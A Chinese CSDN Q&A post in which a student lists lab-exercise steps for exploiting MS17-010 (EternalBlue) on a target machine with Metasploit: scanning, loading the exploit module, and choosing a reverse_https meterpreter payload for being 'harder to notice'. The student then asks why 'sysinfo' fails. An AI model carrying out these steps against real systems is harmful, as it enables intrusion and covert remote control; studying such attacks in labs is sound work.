健达.奇趣蛋 2022-11-10 09:36 采纳率: 100%
浏览 24
已结题

ms17_010漏洞利用

1.使用命令msfconsole启动metasploit平台

  1. 使用命令search搜索msf模块auxiliary/scanner/smb/smb_ms17_010验证目标靶机是否存在此漏洞。

3.使用命令use auxiliary/scanner/smb/smb_ms17_010来调用漏洞扫描检测模块。 使用show options查看需要配置的参数。

4.使用set RHOSTS设置靶机地址,使用exploit或者run命令运行扫描模块。

5.通过扫描发现目标靶机存在MS17_010漏洞,下一步使用use命令调用exploit/windows/smb/ms17_010_eternalblue漏洞利用模块,然后使用show options命令查看配置参数,并对目标靶机地址进行设置。

6.使用命令set PAYLOAD设置一个攻击在和模块,这里我们使用HTTPS协议的meterpreter反弹载荷windows/x64/meterpreter/reverse_https更不容易察觉。

7.使用命令show options查看载荷模块需要配置的参数。

8.使用命令set RHOST设置目标靶机地址,然后使用set LHOST设置渗透机地址。

9.使用命令run或者exploit来运行该模块,开始渗透。

10.使用命令sysinfo来查看目标靶机信息。

题目是这样的但是做到sysinfo报错了说unkonw commonand:sysinfo是为什么?

img

  • 写回答

1条回答 默认 最新

  • CSDN-Ada助手 CSDN-AI 官方账号 2022-11-10 20:02
    关注
    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论

报告相同问题?

问题事件

  • 系统已结题 11月19日
  • 已采纳回答 11月11日
  • 修改了问题 11月10日
  • 修改了问题 11月10日
  • 展开全部

悬赏问题

  • ¥15 LSPI算法的大问题
  • ¥15 java导出word 动态填充数据
  • ¥15 python SSH连接设备使用STD读配置卡死的问题
  • ¥20 扑克的算牌公式及软件制作
  • ¥20 如何通过云图中RPG去计算云图上不同位置的值?
  • ¥15 请问不小心下载到了钓鱼软件怎么办?
  • ¥15 求国博抢票 求国博抢票 有的私
  • ¥50 swiftui @query 报错
  • ¥50 怎么解决刷卡或扫码后,点击软件输入框,win10屏幕键盘不会自动弹出的问题
  • ¥15 如何使用arcgispro的训练深度模型,发现water和nowater精度为0?(相关搜索:深度学习)